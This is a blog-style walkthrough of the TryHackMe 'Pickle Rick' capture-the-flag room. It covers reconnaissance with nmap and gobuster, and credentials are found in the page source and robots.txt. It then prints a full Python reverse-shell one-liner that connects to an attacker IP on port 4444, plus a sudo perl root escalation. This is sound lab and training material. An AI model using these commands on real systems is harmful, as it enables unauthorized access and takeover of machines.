TryHackMe Walkthrough | Pickle Rick!

A Rick and Morty CTF. Help turn Rick back into a human!

Prerequisites

Before deploying the machine make sure you have you VPN ready.

Now will deploy the machine after the VPN is enabled.

Reconnaissance

Performing a nmap scan we see that we have 2 ports open(22 and 80). So that’s means we have a webpage also.

nmap -sC -sV -p- — min-rate=10000 -oN nmap <Target_IP>

We have a webpage

Checking source code and robots.txt

We get the username in the source code of the page.

In robots.txt we have a string that might be passoword.

Running gobutser and found out the login page.

gobuster dir -u <IP> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,htm

We get a login page and we use the username and password we found earlier from the source code and the robots.txt

We get an option to input commands and execute them.

on doing an ls the command we see all the files.

Instead of giving commands here, I choose to get a python reverse shell.

Checking if python exists.

And yes it has python3

Now executing our payload.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<Attacker_IP>”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Before Executing make sure your netcat is listening on the mentioned PORT.

Got the Reverse Shell on port 4444

nc -nlvp 4444

Finding Flags

1st Flag

2nd Flag is inside the /rick directory

Escalating Privileges

Checking the permissions and we find out that we can run all the commands on the system as sudo.

We can see that this user can run everything as sudo user.

I used sudo perl command to become root.

sudo perl -e ‘exec “/bin/sh”;’

3rd Flag.

In the root directory, we find the root flag as 3rd.txt

and we successfully finished the room and helped rick turn back into his natural form.

Leave some Claps if you found this useful.